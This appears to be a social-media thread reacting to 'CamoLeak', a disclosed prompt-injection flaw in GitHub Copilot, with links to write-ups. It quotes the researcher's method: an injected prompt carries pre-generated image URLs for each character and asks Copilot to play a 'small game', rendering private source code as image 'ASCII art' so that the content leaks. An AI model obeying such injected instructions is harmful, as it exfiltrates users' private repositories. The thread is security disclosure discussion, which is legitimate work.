fucking lol. remember the rick astley attack on github copilot? same guy's found another one https://www.legitsecurity.com/blog/camoleak-critical-github-copilot-vulnerability-leaks-private-source-code (fixed 14 aug)
EDIT: gitlab, not github sorry!
fucking lol. remember the rick astley attack on github copilot? same guy's found another one https://www.legitsecurity.com/blog/camoleak-critical-github-copilot-vulnerability-leaks-private-source-code (fixed 14 aug)
EDIT: gitlab, not github sorry!
@melunaka https://pivot-to-ai.com/2025/05/24/ai-coding-bot-allows-prompt-injection-with-a-pull-request/
gitlab not github, sorry!
"I spent a long time thinking about this problem before this crazy idea struck me.
If I create a dictionary of all letters and symbols in the alphabet, pre-generate their corresponding Camo URLs, embed this dictionary into the injected prompt, and then ask Copilot to play a “small game” by rendering the content I want to leak as “ASCII art” composed entirely of images, will Copilot inject valid Camo images that the browser will render by their order? Yes, it will."
Haha
@davidgerard fun fact! they have been aware of this vuln since may, the report above is a duplicate. original finder of the vuln here lol
(yes, they seriously consider a LLM leaking your private repo contents as a "low risk issue")
An information disclosure vulnerability was identified in GitHub Enterprise Server via attacker uploaded asset URL allowing the attacker to retrieve metadata information of a user who clicks on the URL and further exploit it to create a convincing phishing page. This required the attacker to upload malicious SVG files and phish a victim user to click on that uploaded asset URL. This...